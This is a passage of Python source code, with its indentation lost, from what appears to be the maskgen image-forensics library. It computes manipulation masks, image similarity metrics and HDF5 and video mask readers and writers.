all = np.zeros((img2_array.shape[0], img2_array.shape[1])).astype('uint16')
all[img2_array == 0] = ii16.max
return np.zeros((img1_array.shape[0], img1_array.shape[1])).astype('uint16'), all
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def convert16bitcolor(rawimg1, rawimg2):
return rawimg1.to_array().astype('int16'), rawimg2.to_array().astype('int16')
def __alignChannels(rawimg1, rawimg2, convertFunction=None):
"""
:param rawimg1:
:param rawimg2:
    :param convertFunction:
:return:
@type rawimg1: ImageWrapper
@type rawimg2: ImageWrapper
"""
if convertFunction is not None:
return convertFunction(rawimg1, rawimg2)
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def __findBestMatch(big, small):
""" Return a tuple describing the bounding box (xl,xh,yl,yh) with the most
likely match to the small image.
"""
if len(small.shape) == 3 and len(big.shape) == 3 and \
small.shape[2] == 4 and big.shape[2] == 3:
newsmall = np.zeros((small.shape[0], small.shape[1], 3))
newsmall[:, :, :] = small[:, :, 0:3]
small = newsmall
if np.any(np.asarray([(x[1] - x[0]) for x in zip(small.shape, big.shape)]) < 0):
return None
result = cv2.matchTemplate(big.astype('float32'), small.astype('float32'), cv2api.cv2api_delegate.tm_sqdiff_normed)
mn, _, mnLoc, _ = cv2.minMaxLoc(result)
result_tuple = (mnLoc[1], mnLoc[0], mnLoc[1] + small.shape[0], mnLoc[0] + small.shape[1])
if result_tuple[2] > big.shape[0] or result_tuple[3] > big.shape[1]:
return None
return result_tuple
def bm(X, patch):
from sklearn.metrics import mean_absolute_error
bv = 999999.0
bp = (0, 0)
for i in range(X.shape[0] - patch.shape[0]):
for j in range(X.shape[1] - patch.shape[1]):
v = mean_absolute_error(X[i:i + patch.shape[0], j:j + patch.shape[1]], patch)
if v < bv:
bv = v
bp = (i, j)
return bp, bv
def composeCropImageMask(img1, img2, location=None):
""" Return a masking where img1 is bigger than img2 and
img2 is likely a crop of img1.
images are 16 bit unnsigned or floating point.
@return change mask aligned to in img1 dimensions, dictionary of analysis keys
@type img1: np.array
@type img2: np.array
"""
analysis = {}
analysis['location'] = '(0,0)'
if location is not None:
matched_tuple = (location[0],location[1],img2.shape[0]+location[0],img2.shape[1]+location[1])
else:
matched_tuple = __findBestMatch(img1, img2)
if matched_tuple is not None:
diffIm = np.zeros(img1.shape).astype(img1.dtype)
diffIm[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = img2
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
dst = np.abs(img1 - diffIm)
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
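# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A hedged sketch of composeCropImageMask where img2 is a known crop of img1; the
# crop location (5, 7) and the array sizes are arbitrary illustrative values.
def _example_composeCropImageMask():
    import numpy as np
    img1 = np.random.randint(1, 255, size=(40, 40)).astype('uint16')
    img2 = img1[5:25, 7:27]
    mask, analysis = composeCropImageMask(img1, img2, location=(5, 7))
    # mask is 255 inside the cropped area, 0 elsewhere; analysis['location'] == '(5, 7)'
    return mask, analysis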
def composeCloneMask(changemask, startimage, finalimage):
"""
:param changemask:
:param startimage:
:param finalimage:
:return:
@type changemask: ImageWrapper
@type startimage: ImageWrapper
@type finalimage: ImageWrapper
"""
mask = np.asarray(changemask.invert())
start_image_array = np.array(startimage)
final_image_array = np.array(finalimage)
newmask = np.zeros(start_image_array.shape).astype('uint8')
try:
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
try:
cnt = contours[i]
x, y, w, h = cv2.boundingRect(cnt)
if w <= 2 or h <= 2:
continue
final_image_subarray = final_image_array[y:y + h, x:x + w]
for i in range(final_image_subarray.shape[2]):
final_image_subarray[:, :, i] = final_image_subarray[:, :, i] * (mask[y:y + h, x:x + w] / 255)
matched_tuple = __findBestMatch(start_image_array, final_image_subarray)
if matched_tuple is not None:
newmask[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = 255
except Exception as e:
logging.getLogger('maskgen').warning('Failed to compose clone mask: ' + str(e))
continue
except Exception as e:
return changemask.to_array()
return newmask
def __composeExpandImageMask(img1, img2):
""" Return a masking where img1 is smaller than img2 and
img2 contains img1.
"""
matched_tuple = __findBestMatch(img2, img1)
analysis = {}
if matched_tuple is not None:
diffIm = img2[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]]
dst = np.abs(img1 - diffIm)
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def __colorPSNR(z1, z2, size=None):
if size == 0:
return 0.0
d = (z1 - z2) ** 2
sse = np.sum(d)
size = float(reduce(lambda x, y: x * y, d.shape)) if size is None else float(size)
mse = float(sse) / size
return 0.0 if mse == 0.0 else 20.0 * math.log10(255.0 / math.sqrt(mse))
def sizeDiff(z1, z2):
"""
z1 and z2 are expected to be PIL images
"""
    # PIL Image size is (width, height), the reverse of numpy shape ordering
return str((int(z2.size[1] - z1.size[1]), int(z2.size[0] - z1.size[0])))
def invertMask(mask):
return mask.invert()
def convertToMask(im):
"""
    Takes an image and produces a mask where all black areas are white
"""
return im.to_mask()
def __checkInterpolation(val):
    validVals = ['nearest', 'lanczos', 'bilinear', 'bicubic', 'cubic']
return val if val in validVals else 'nearest'
def applyMask(image, mask, value=0):
if mask.shape != image.shape:
mask = cv2.resize(mask, (image.shape[1], image.shape[0]))
image = np.copy(image)
image[mask == 0] = value
return image
def carveMask(image, mask, expectedSize):
"""
Trim a mask after seam carving
:param image:
:param mask:
:param expectedSize:
:return:
"""
newimage = np.zeros(expectedSize).astype('uint8')
if expectedSize[0] == mask.shape[0]:
for x in range(expectedSize[0]):
topaste = image[x, mask[x, :] == 255]
if (len(topaste)) <= newimage.shape[1]:
newimage[x, 0:len(topaste)] = topaste
else:
newimage[x, :] = topaste[0:len(topaste)]
elif expectedSize[1] == mask.shape[1]:
for y in range(expectedSize[1]):
topaste = image[mask[:, y] == 255, y]
if (len(topaste)) <= newimage.shape[0]:
newimage[0:len(topaste), y] = topaste
else:
newimage[:, y] = topaste[0:len(topaste)]
else:
return applyMask(image, mask)
return newimage
def alterMask(compositeMask,
edgeMask,
rotation=0.0,
targetShape=(0, 0),
interpolation='nearest',
location=(0, 0),
transformMatrix=None,
flip=None,
crop=False,
cut=False):
res = compositeMask
# rotation may change the shape
# transforms typical are created for local operations (not entire image)
if location != (0, 0) or crop:
if targetShape != res.shape:
# inverse crop
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (min(res.shape[0] + location[0], newRes.shape[0]),
min(res.shape[1] + location[1], newRes.shape[0]))
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
else:
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
if transformMatrix is not None and not cut and flip is None:
res = applyTransformToComposite(compositeMask, edgeMask, transformMatrix)
elif abs(rotation) > 0.001:
if targetShape != res.shape or abs(rotation) % 90 < 0.001:
res = __rotateImage(rotation, compositeMask,
expectedDims=targetShape,
cval=0)
else:
res = applyRotateToComposite(rotation, res,
edgeMask,
targetShape)
# if transform matrix provided and alternate path is taken above
if flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
res = applyMask(res, edgeMask)
if targetShape != res.shape:
res = applyResizeComposite(res, targetShape)
return res
def alterReverseMask(donorMask, edgeMask, rotation=0.0, location=(0, 0),
transformMatrix=None, flip=None, crop=False, cut=False, targetShape=None):
res = donorMask
    # if we are cutting, then we do not want to use the edge mask as the mask for the transformation.
# see the cut section below, where the transform occurs directly on the mask
# this occurs in donor cases
if ((location != (0, 0) or crop) and not cut):
if targetShape != donorMask.shape:
# inverse crop
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
else:
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (res.shape[0] + location[0], res.shape[1] + location[1])
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
if transformMatrix is not None and not cut and flip is None:
res = applyTransform(res, mask=edgeMask, transform_matrix=transformMatrix, invert=True,
returnRaw=False)
elif abs(rotation) > 0.001:
res = __rotateImage(-rotation, res, expectedDims=targetShape, cval=0)
elif flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
# res is the donor mask
# edgeMask may be the overriding mask from a PasteSplice, thus in the same shape
        # The transform will convert to the target mask size of the donor path.
res = applyMask(res, edgeMask)
if transformMatrix is not None:
res = cv2.warpPerspective(res, transformMatrix, (targetShape[1], targetShape[0]),
flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=0).astype('uint8')
    # need to use the target size since the expected size does not align with the donor paths.
if targetShape != res.shape:
res = cv2.resize(res, (targetShape[1], targetShape[0]))
return res
def __toMask(im):
"""
Performs same functionality as convertToMask, but takes and returns np array
"""
if len(im.shape) < 3:
return im
imGray = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)
gray_image = np.ones(imGray.shape).astype('uint8')
gray_image[imGray < 255] = 0
gray_image *= 255
if im.shape[2] == 4:
gray_image[im[:, :, 3] == 0] = 255
return gray_image
def mergeColorMask(compositeMaskArray, newMaskArray):
matches = np.any(newMaskArray != [255, 255, 255], axis=2)
compositeMaskArray[matches] = newMaskArray[matches]
return compositeMaskArray
def mergeMask(compositeMask, newMask, level=0):
if compositeMask.shape != newMask.shape:
compositeMask = cv2.resize(compositeMask, (newMask.shape[1], newMask.shape[0]))
newMask = ImageWrapper(newMask).to_mask().to_array()
else:
compositeMask = np.copy(compositeMask)
compositeMask[newMask == 0] = level
return compositeMask
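# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A minimal sketch of mergeMask: stamp a level value into a composite wherever the
# new mask is 0 (i.e. changed pixels).  Level 7 is an arbitrary choice.
def _example_mergeMask():
    import numpy as np
    composite = np.zeros((16, 16), dtype='uint8')
    new_mask = np.full((16, 16), 255, dtype='uint8')
    new_mask[4:8, 4:8] = 0  # 0 marks the newly changed pixels
    return mergeMask(composite, new_mask, level=7)  # level 7 in the changed block, 0 elsewhere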
def ssim(X, Y, MASK, **kwargs):
from scipy.ndimage import gaussian_filter
K1 = kwargs.pop('K1', 0.01)
R = kwargs.pop('R', 255)
K2 = kwargs.pop('K2', 0.03)
sigma = kwargs.pop('sigma', 1.5)
X = X.astype(np.float64)
Y = Y.astype(np.float64)
win_size = 1
cov_norm = 1.0 # population covariance to match Wang et. al. 2004
filter_func = gaussian_filter
filter_args = {'sigma': sigma}
# compute (weighted) means
ux = filter_func(X, **filter_args)
uy = filter_func(Y, **filter_args)
# compute (weighted) variances and covariances
uxx = filter_func(X * X, **filter_args)
uyy = filter_func(Y * Y, **filter_args)
uxy = filter_func(X * Y, **filter_args)
vx = cov_norm * (uxx - ux * ux)
vy = cov_norm * (uyy - uy * uy)
vxy = cov_norm * (uxy - ux * uy)
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1,
2 * vxy + C2,
ux ** 2 + uy ** 2 + C1,
vx + vy + C2))
D = B1 * B2
S = ((A1 * A2) / D) * MASK
# compute (weighted) mean of ssim
return S.mean()
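# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A hedged sketch of the masked SSIM above: comparing an image with itself under a
# full mask yields 1.0.
def _example_ssim():
    import numpy as np
    x = np.random.randint(0, 255, size=(32, 32)).astype('float64')
    return ssim(x, x, np.ones((32, 32)))  # -> 1.0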
def img_analytics(z1, z2, mask=None):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = {'psnr': __colorPSNR(z1, z2)}
if mask is not None:
mask = np.copy(mask)
mask[mask > 0] = 1
result.update({'local psnr': __colorPSNR(z1 * mask, z2 * mask, size=sumMask(mask))})
return result
def __diffMask(img1, img2, invert, args=None):
itype = np.iinfo(img1.dtype)
dst = np.abs(np.subtract(img1.astype('int32'), img2.astype('int32')))
gray_image = np.zeros(img1.shape).astype('uint8')
difference = float(args['tolerance']) if args is not None and 'tolerance' in args else 0.0001
difference = difference * (itype.max - itype.min)
gray_image[dst > difference] = 255
analysis = img_analytics(img1, img2, mask=gray_image)
return (gray_image if invert else (255 - gray_image)), analysis
def coordsFromString(value):
import re
value = re.sub('[\(\)\,]', ' ', value)
vals = [int(float(v)) for v in value.split(' ') if v != ' ' and v != '']
return tuple(vals)
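# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# coordsFromString parses a coordinate string such as the 'location' analysis values above.
def _example_coordsFromString():
    return coordsFromString('(12, 34)')  # -> (12, 34)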
def fixTransparency(img):
return img.apply_transparency()
def dictDeepUpdate(aDictionary, aPartialDictionary):
for k, v in aPartialDictionary.iteritems():
if k in aDictionary and type(v) == dict:
dictDeepUpdate(aDictionary[k], v)
else:
aDictionary[k] = v
def grayToRGB(frame):
"""
    Project a grayscale frame into the green channel of an RGB frame.
"""
result = np.zeros((frame.shape[0], frame.shape[1], 3))
if len(frame.shape) == 2:
result[:, :, 1] = frame
else:
summary = np.zeros((frame.shape[0], frame.shape[1]))
for d in range(frame.shape[2]):
summary[:, :] += frame[:, :, d]
summary[summary > 0] = 255
result[:, :, 1] = summary
return result.astype('uint8')
def composeVideoMaskName(maskprefix, starttime, suffix):
"""
:param maskprefix:
:param starttime:
:param suffix:
:return: A mask file name using the provided components
"""
if maskprefix.endswith('_mask_' + str(starttime)):
return maskprefix + '.' + suffix
return maskprefix + '_mask_' + str(starttime) + '.' + suffix
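# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# composeVideoMaskName builds a mask file name from a prefix, a start time and a suffix.
def _example_composeVideoMaskName():
    return composeVideoMaskName('scene1', 0, 'hdf5')  # -> 'scene1_mask_0.hdf5'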
def convertToVideo(filename, preferences=None, start_frame=None, start_time=0):
suffix = '.' + preferredSuffix(preferences=preferences)
fn = os.path.splitext(filename)[0] + (str(start_frame) if start_frame is not None else '') + suffix
if os.path.exists(fn):
if os.stat(filename).st_mtime < os.stat(fn).st_mtime:
return fn
else:
os.remove(fn)
reader = GrayBlockReader(filename,
convert=True,
preferences=preferences,
start_frame=start_frame,
start_time=start_time)
while True:
mask = reader.read()
if mask is None:
break
fn = reader.writer.filename
return fn
executions = {}
def cancel_execute(worker_func):
if worker_func in executions:
executions[worker_func].cancel()
def execute_every(interval, worker_func, start=True, **kwargs):
executions[worker_func] = threading.Timer(
interval,
execute_every, [interval, worker_func, False], kwargs)
executions[worker_func].start()
if not start:
worker_func(**kwargs)
class GrayBlockFrameFirstLayout():
name = 'framefirst'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[0]
@staticmethod
def count(reader):
return reader.dset.shape[0]
@staticmethod
def get_frame(reader):
return reader.dset[reader.pos]
@staticmethod
def initial_shape(shape, size = None):
return (size,) + shape
@staticmethod
def resize(shape, writer):
if writer.dset.shape[0] < (writer.pos + 1):
writer.dset.resize((writer.pos + 1,) + writer.dset.shape[1:])
@staticmethod
def set(writer,mask):
writer.dset[ writer.pos] = mask
class GrayBlockFrameLastLayout():
name = 'framelast'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[-1]
@staticmethod
def count(reader):
return reader.dset.shape[-1]
@staticmethod
def get_frame(reader):
return reader.dset[:, :, reader.pos]
@staticmethod
def initial_shape(shape, size=None):
return (shape)[:-1] + (size,)
@staticmethod
def resize(shape, writer):
if writer.dset.shape[-1] < (writer.pos + 1):
writer.dset.resize((shape)[:-1] + (writer.pos + 1,))
@staticmethod
def set(writer,mask):
if len(writer.dset.shape) == 2:
writer.dset[:, :, writer.pos] = mask
else:
writer.dset[:, :, :, writer.pos] = mask
class GrayBlockReader:
def __init__(self, filename,
convert=False,
preferences=None,
start_time=0,
start_frame=None,
end_frame=None):
import h5py
self.writer = None
self.start_frame = start_frame
self.start_time = start_time
self.preferences = preferences
self.filename = filename
self.h_file = h5py.File(filename, 'r')
grp_names = self.h_file.keys()
if 'masks' in grp_names:
self.grps = ['masks']
self.setter = OldFormatGroupSetter()
else:
self.setter = NewFormatGroupSetter()
self.grps = [str(x) for x in sorted([int(x) for x in grp_names])]
# group selection
self.grp_pos = 0
# frame selection in group (relative to start of group)
self.pos = 0
# the smart numpy array
self.dset = None
# where to stop
self.end_frame = end_frame
self.fps = self.h_file.attrs['fps']
self.mask_format = MASKFORMATS[
self.h_file.attrs['mask_format'] if 'mask_format' in self.h_file.attrs else GrayBlockFrameFirstLayout.name]
self.setter.set_group(self, start_time=start_time, start_frame=start_frame, end_frame=end_frame)
self.convert = convert
self.writer = GrayFrameWriter(os.path.splitext(filename)[0],
self.fps,
preferences=preferences) if self.convert else DummyWriter()
def create_writer(self):
"""
:return:
@rtype: GrayBlockWriter
"""
import time
dir = os.path.dirname(self.filename)
prefix = os.path.join(dir,os.path.basename(self.h_file.attrs['prefix'])) if 'prefix' in self.h_file.attrs else os.path.splitext(self.filename)[0][:48]
return GrayBlockWriter(prefix + str(time.clock()), self.fps)
def set_group(self, start_frame=None, start_time=1, end_frame=None):
self.setter.set_group(self, start_frame=start_frame,start_time=start_time, end_frame=end_frame)
def current_frame_time(self):
return self.start_time + (self.pos * (1000 / self.fps))
def current_frame(self):
return self.start_frame + self.pos
def length(self):
return self.mask_format.count(self)
def read(self):
if self.dset is None:
return None
if self.end_frame is not None and self.current_frame() == self.end_frame + 1:
return None
if self.mask_format.is_end(self):
self.grp_pos+=1
if self.grp_pos < len(self.grps):
self.setter.select_group(self, self.grp_pos)
else:
self.dset = None
return None
mask = self.mask_format.get_frame(self)
mask = mask.astype('uint8')
self.writer.write(mask, self.start_frame + self.pos, self.current_frame_time())
self.pos += 1
return mask
def release(self):
pass
def close(self):
self.h_file.close()
if self.writer is not None:
self.writer.close()
MASKFORMATS = {GrayBlockFrameFirstLayout.name:GrayBlockFrameFirstLayout(),
GrayBlockFrameLastLayout.name:GrayBlockFrameLastLayout()}
class GrayBlockReaderManager:
def __init__(self, reader_type= GrayBlockReader):
self.reader_type = reader_type
self.reader = None
self.filename = None
def create_reader(self, filename,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param filename:
:param start_frame:
:param start_time:
:param end_frame: optional stopping point
:return:
@type filename: str
@rtype: GrayBlockReader
"""
if filename == self.filename:
self.reader.set_group(start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
else:
if self.reader is not None:
self.reader.close()
self.filename = filename
self.reader = self.reader_type(filename,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
return self.reader
def close(self):
if self.reader is not None:
self.reader.close()
self.reader = None
class GrayBlockWriterManager:
def __init__(self):
self.writer = None
def create_writer(self, reader):
"""
:param reader:
:return:
@type reader: GrayBlockReader
@rtype: GrayBlockWriter
"""
if self.writer is not None:
return self.writer
self.writer= reader.create_writer()
return self.writer
def close(self):
if self.writer is not None:
self.writer.close()
self.writer = None
class NewFormatGroupSetter:
"""
Multiple Mask Segment per HDF5 File, one in each group.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=1,end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
grp_pos = 0
if start_frame is not None:
pos = len([x for x in reader.grps if int(x) <= start_frame]) - 1
grp_pos = pos if pos > 0 else grp_pos
NewFormatGroupSetter.select_group(reader,
grp_pos,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
@staticmethod
def select_group(reader,
grp_pos,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param reader:
        :param grp_pos:
:param start_frame:
:param start_time:
:param end_frame: determine end frame
:return:
"""
reader.grp_pos = grp_pos
reader.current_group = reader.h_file.get(reader.grps[grp_pos])
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.current_group.attrs[
'start_time'] if 'start_time' in reader.current_group.attrs else start_time
reader.start_frame = reader.current_group.attrs[
'start_frame'] if 'start_frame' in reader.current_group.attrs else start_frame
end_frame = reader.current_group.attrs[
'end_frame'] if 'end_frame' in reader.current_group.attrs and end_frame is None else end_frame
reader.end_frame = end_frame if end_frame is not None else None
        reader.pos = 0 if start_frame is None else start_frame - reader.start_frame
class OldFormatGroupSetter:
"""
One Mask Segment per HDF5 File.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=0, end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
reader.current_group = reader.h_file.get('masks')
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.h_file.attrs[
'start_time'] if 'start_time' in reader.h_file.attrs else start_time
reader.start_frame = reader.h_file.attrs[
'start_frame'] if 'start_frame' in reader.h_file.attrs else start_frame
        reader.pos = 0 if start_frame is None else start_frame - reader.start_frame
@staticmethod
def select_group(reader, grp_pos, start_frame=None, start_time=0,end_frame=None):
OldFormatGroupSetter.set_group(reader,start_frame=start_frame,start_time=start_time)
def compose_overlay_name(target_file="", link = tuple()):
path_tuple = os.path.split(target_file)
return os.path.join(path_tuple[0], path_tuple[1] + str(hash(link))[:5] + '_overlay.' + preferredSuffix())
class GrayBlockOverlayGenerator:
def __init__(self, locator, segments = [], target_file = None, output_file = ""):
from video_tools import get_frames_from_segment
self.target_file = target_file
self.output_file = output_file
segments = [segment for segment in segments if segment.media_type == 'video' and segment.filename != None]
self.segments = sorted(segments, key=lambda segment: segment.startframe)
self.segment_index = 0
self.segment = segments[self.segment_index]
self.readerManager = GrayBlockReaderManager()
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
self.overlay_mask_name = os.path.join(os.path.split(self.segment.filename)[0], '_overlay')
self.writer = GrayFrameOverlayWriter(
mask_prefix=self.overlay_mask_name,
fps=self.reader.fps)
self.last_frame = get_frames_from_segment(locator.getMaskSetForEntireVideo()[0])
def updateSegment(self):
self.segment_index += 1
self.segment = self.segments[self.segment_index]
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
def generate(self):
while self.writer.lastPos < self.last_frame:
frame_time = self.reader.current_frame_time()
frame_count = self.reader.current_frame()
mask = self.reader.read()
if mask is None:
if self.segment_index + 1 < len(self.segments):
self.updateSegment()
else:
frame_count = self.last_frame #write blanks for the rest
self.writer.write(mask, frame_count, frame_time)
self.writer.close()
self.readerManager.close()
ffmpeg_overlay(self.target_file, self.writer.filename, self.output_file)
try:
os.remove(self.writer.filename) #clean up the mask file, leave the finished overlay
except OSError:
pass
class DummyWriter:
def write(self, mask, mask_number, mask_time):
pass
def close(self):
pass
class GrayBlockWriter:
"""
Write Gray scale (Mask) images to a compressed block file
"""
def __init__(self, mask_prefix, fps, layout=GrayBlockFrameFirstLayout()):
self.fps = fps
self.dset = None
self.pos = 0
self.h_file = None
self.suffix = 'hdf5'
self.filename = None
self.mask_prefix = mask_prefix
self.mask_format = layout
self.last_frame = 1
self.last_time = 0
self.current_group = None
def write(self, mask, mask_time, frame_number):
import h5py
if self.current_group is not None and frame_number - self.last_frame > 1:
grp = self.current_group
grp.attrs['end_time'] = self.last_time
grp.attrs['end_frame'] = self.last_frame
self.current_group = None
if self.h_file is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('Writing to ' + self.filename)
if os.path.exists(self.filename):
os.remove(self.filename)
self.h_file = h5py.File(self.filename, 'w')
self.h_file.attrs['fps'] = self.fps
self.h_file.attrs['prefix'] = os.path.basename(self.mask_prefix)
self.h_file.attrs['mask_format'] = self.mask_format.name
self.current_group = None
if self.current_group is None:
self.current_group = self.h_file.create_group(str(frame_number))
grp = self.current_group
grp.attrs['start_time'] = mask_time
grp.attrs['start_frame'] = frame_number
self.dset = grp.create_dataset("masks",
self.mask_format.initial_shape(mask.shape, size=10),
compression="gzip",
chunks=True,
maxshape=self.mask_format.initial_shape(mask.shape))
self.pos = 0
self.mask_format.resize(mask.shape, self)
self.last_frame = frame_number
self.last_time = mask_time
self.mask_format.set(self, mask)
self.pos += 1
def get_file_name(self):
return self.filename
def close(self):
self.release()
def release(self):
if self.current_group is not None:
self.current_group.attrs['end_time'] = self.last_time
self.current_group.attrs['end_frame'] = self.last_frame
self.current_group = None
self.dset = None
if self.h_file is not None:
self.h_file.close()
self.h_file = None
def preferredSuffix(preferences=None):
import sys
default_suffix = 'm4v'
if sys.platform.startswith('win'):
default_suffix = 'avi'
if sys.platform.startswith('linux'):
default_suffix = 'avi'
if preferences is not None:
t_suffix = getValue(preferences,'vid_suffix')
default_suffix = t_suffix if t_suffix is not None else default_suffix
return default_suffix
class GrayBlockFactory:
"""
    Build a GrayBlockWriter unless an alternate writer (e.g. a validator) is supplied.
"""
def __init__(self, writer =None):
self.writer = writer
def __call__(self, name, fps):
return GrayBlockWriter(mask_prefix=name, fps=fps) if self.writer is None else self.writer
class GrayBlockValidator():
"""
Compare frames of two video masks to see if one is valid.
"""
def __init__(self, jt_mask_file, validation_function):
self.filename = jt_mask_file
self.failed_frames = []
self.manager = GrayBlockReaderManager()
self.validation_function = validation_function
self.manager.create_reader(jt_mask_file)
def write(self, mask, mask_time, frame_number):
while(self.manager.reader.current_frame() < frame_number):
self.manager.reader.read() #ffwd to where we want to be
if self.manager.reader.current_frame() == frame_number:
jt_mask = self.manager.reader.read()
if jt_mask is not None:
if not self.validation_function(jt_mask,mask):
self.failed_frames.append(frame_number)
def get_file_name(self):
return self.filename
class GrayFrameWriter:
"""
Write Gray scale (Mask) video images
"""
capOut = None
codec = 'AVC1'
suffix = 'm4v'
fourcc = None
filename = None
fps = 0
mask_prefix = None
def __init__(self, mask_prefix, fps, preferences=None):
import sys
self.fps = fps
self.mask_prefix = mask_prefix
self.suffix = preferredSuffix(preferences=preferences)
t_codec = None
if preferences is not None and 'vid_codec' in preferences:
t_codec = preferences['vid_codec']
if t_codec is None and sys.platform.startswith('win'):
self.codec = 'XVID'
elif t_codec is None and sys.platform.startswith('linux'):
self.codec = 'XVID'
elif t_codec is not None:
self.codec = str(t_codec)
        self.fourcc = cv2api.cv2api_delegate.get_fourcc(self.codec) if self.codec != 'raw' else 0
def write(self, mask, mask_number, mask_time):
if self.capOut is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('writing using fourcc ' + str(self.fourcc))
if os.path.exists(unicode(os.path.abspath(self.filename))):
os.remove(unicode(os.path.abspath(self.filename)))
self.capOut = cv2.VideoWriter(unicode(os.path.abspath(self.filename)),
self.fourcc,
self.fps,
(mask.shape[1], mask.shape[0]),
len(mask.shape) > 2 and mask.shape[2] > 1)
if cv2.__version__.startswith('2.4.11'):
mask = grayToRGB(mask)
self.capOut.write(mask)
def close(self):
if self.capOut is not None:
self.capOut.release()
self.capOut = None
def release(self):
self.close()
class GrayFrameOverlayWriter(GrayFrameWriter):
def __init__(self, mask_prefix = '', fps = 30/1, preferences = None):
GrayFrameWriter.__init__(self, mask_prefix=mask_prefix, fps=fps, preferences = preferences)
self.lastPos = 0
self.blankMask = None
def write(self, mask, mask_number, mask_time):
if self.blankMask is None:
self.blankMask = np.ones((mask.shape[0], mask.shape[1]), dtype=np.uint8) * 255
frames_to_write = mask_number - self.lastPos #write all the frames up to and including the mask frame
for i in range(1,frames_to_write+1):
frame_num = self.lastPos + i
mask_time = frame_num * 1000.0 / self.fps #refigure time for the frame we actually write
GrayFrameWriter.write(self,
mask=mask if frame_num == mask_number and mask is not None else self.blankMask,
mask_number=frame_num,
mask_time=mask_time)
self.lastPos = mask_number
def widthandheight(img):
a = np.where(img != 0)
if len(a[0]) == 0:
return 0, 0, 0, 0
bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])
h, w = bbox[1] - bbox[0], bbox[3] - bbox[2]
return bbox[2], bbox[0], w, h
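# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# widthandheight returns (x, y, w, h) of the non-zero pixels, with w and h measured
# as max index minus min index.
def _example_widthandheight():
    import numpy as np
    mask = np.zeros((20, 20), dtype='uint8')
    mask[3:7, 5:11] = 255
    return widthandheight(mask)  # -> (5, 3, 5, 3)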
def place_in_image(mask, image_to_place, image_to_cover, placement_center, rect=None):
x, y, w, h = widthandheight(mask)
if rect:
if w > rect[2]:
x = x + (w - rect[2]) / 2
w = rect[2]
if h > rect[3]:
y = y + (h - rect[3]) / 2
h = rect[3]
w += w % 2
h += h % 2
x_offset = int(placement_center[0]) - int(math.floor(w / 2))
y_offset = int(placement_center[1]) - int(math.floor(h / 2))
if y_offset < 0:
return None
if x_offset < 0:
return None
image_to_cover = np.copy(image_to_cover)
flipped_mask = 255 - mask
for c in range(0, 3):
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] = \
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] * \
(flipped_mask[y:y + h, x:x + w] / 255) + \
image_to_place[y:y + h, x:x + w, c] * \
